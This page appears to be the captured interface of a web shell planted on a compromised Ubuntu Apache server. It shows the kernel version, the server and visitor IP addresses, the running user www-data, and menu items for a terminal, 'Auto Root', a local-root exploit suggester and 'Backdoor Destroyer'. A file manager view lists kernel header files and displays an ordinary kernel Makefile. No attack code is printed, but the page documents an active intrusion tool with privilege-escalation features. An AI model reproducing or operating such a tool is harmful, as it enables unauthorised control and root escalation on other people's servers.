Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-4.4.0-210 /
scripts /
mod /
Delete
Unzip
Name
Size
Permission
Date
Action
.gitignore
55
B
-rw-r--r--
2016-01-11 00:01
Makefile
759
B
-rw-r--r--
2021-04-16 11:57
devicetable-offsets.c
5.72
KB
-rw-r--r--
2016-01-11 00:01
empty.c
54
B
-rw-r--r--
2016-01-11 00:01
file2alias.c
37.91
KB
-rw-r--r--
2021-04-16 11:57
mk_elfconfig.c
1.2
KB
-rw-r--r--
2016-01-11 00:01
modpost.c
66.16
KB
-rw-r--r--
2021-04-16 11:57
modpost.h
4.81
KB
-rw-r--r--
2016-01-11 00:01
sumversion.c
11.93
KB
-rw-r--r--
2016-01-11 00:01
Save
Rename
hostprogs-y := modpost mk_elfconfig always := $(hostprogs-y) empty.o modpost-objs := modpost.o file2alias.o sumversion.o devicetable-offsets-file := devicetable-offsets.h $(obj)/$(devicetable-offsets-file): $(obj)/devicetable-offsets.s FORCE $(call filechk,offsets,__DEVICETABLE_OFFSETS_H__) targets += $(devicetable-offsets-file) devicetable-offsets.s # dependencies on generated files need to be listed explicitly $(obj)/modpost.o $(obj)/file2alias.o $(obj)/sumversion.o: $(obj)/elfconfig.h $(obj)/file2alias.o: $(obj)/$(devicetable-offsets-file) quiet_cmd_elfconfig = MKELF $@ cmd_elfconfig = $(obj)/mk_elfconfig < $< > $@ $(obj)/elfconfig.h: $(obj)/empty.o $(obj)/mk_elfconfig FORCE $(call if_changed,elfconfig) targets += elfconfig.h